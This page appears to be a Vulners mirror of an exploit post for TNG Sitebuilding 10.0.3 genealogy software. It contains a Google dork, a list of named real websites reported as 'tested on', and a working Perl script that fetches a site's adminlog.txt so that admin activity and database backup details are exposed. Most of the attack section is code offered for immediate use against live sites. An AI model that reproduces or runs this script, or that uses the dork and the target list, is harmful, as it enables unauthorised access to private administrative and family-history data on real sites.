Vulners
Lucene search
TNG Sitebuilding v. 10.0.3 - Admin Panel Motion Logs Downloader Exploit
TNG Sitebuilding v. 10.0.3 - Admin Panel Motion Logs Downloader Exploit
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact(onlymail) : [email protected]
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com
############################################################
Turkey Security Group
'h4x0re SECURITY'
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : The Next Generation of Genealogy Sitebuilding
|~Affected Version : 10.0.3 and All Version
|~Official Web: http://www.tngsitebuilding.com
|~Official Demo: http://lythgoes.net/genealogy/demo10/
|~RISK : Medium
|~Google Keyword/Dork : intext: "The Next Generation of Genealogy Sitebuilding"
|~Tested On : Kali Linux \ Windows XP
#########################################################
####################ABOUT#############################
Admin adminlog.txt all his movements are recorded file.
This log file is displayed in the target's local directory
Database backup taken in this file where records are shown to be
and you can easily download a database backup
########################################################
Example affected sites.
( http://www.tngsitebuilding.com/usersites.php )
Tested on:
http://www.safamilytree.com/TNG/
http://vanzeggeren.nl/familytree/
http://www.nordseth.nl/sieinofam/
http://lythgoes.net/genealogy/
http://myrootsplace.com/
http://lythgoes.net/genealogy/demo10/
http://www.eastcarolinaroots.com/trees/
https://histfam.familysearch.org/
http://www.earlylds.com/
http://www.jrpoot.eu/tng/
http://www.robisonandblythe.org/
http://www.moore.org.nz/genealogy/
http://www.thenavarres.com/genealogy/
... etc
... etc
==============================================================================00
'adminlog.txt' file Downloader EXPLOIT; remote.pl
==============================================================================00
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title TNG Sitebuilding v. 10.0.3 - Admin Panel Motion Logs Downloader Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-] Example \n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 TARGET /path/ \n";
print "[+] usage2 : perl $0 TARGET / \n";
}
print "\n************************************************************************\n";
print "\* TNG Sitebuilding v. 10.0.3 - Admin Panel Motion Logs Downloader Exploit *\n";
print "\* Exploited By : KnocKout *\n";
print "\* Contact : knockoutr[at]msn[dot]com *\n";
print "\* -- *\n";
print "\*********************************************************************\n\n\n";
($TargetIP, $path, $File,) = @ARGV;
$File="adminlog.txt";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait.. \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "adminlog.txt");
if ($request->is_success)
{
print "[+] $url <= Exploit Basarili!\n\n";
print "[+] OPERASYON TAMAM!\n";
print "[+] adminlog.txt Dosyasi Indirildi \n";
print "[+] goodluck.
\n";
exit();
}
else
{
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
exit();
}
# 0day.today [2018-04-11] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Sep 2014 00:00Current
6.7Medium risk
Vulners AI Score6.7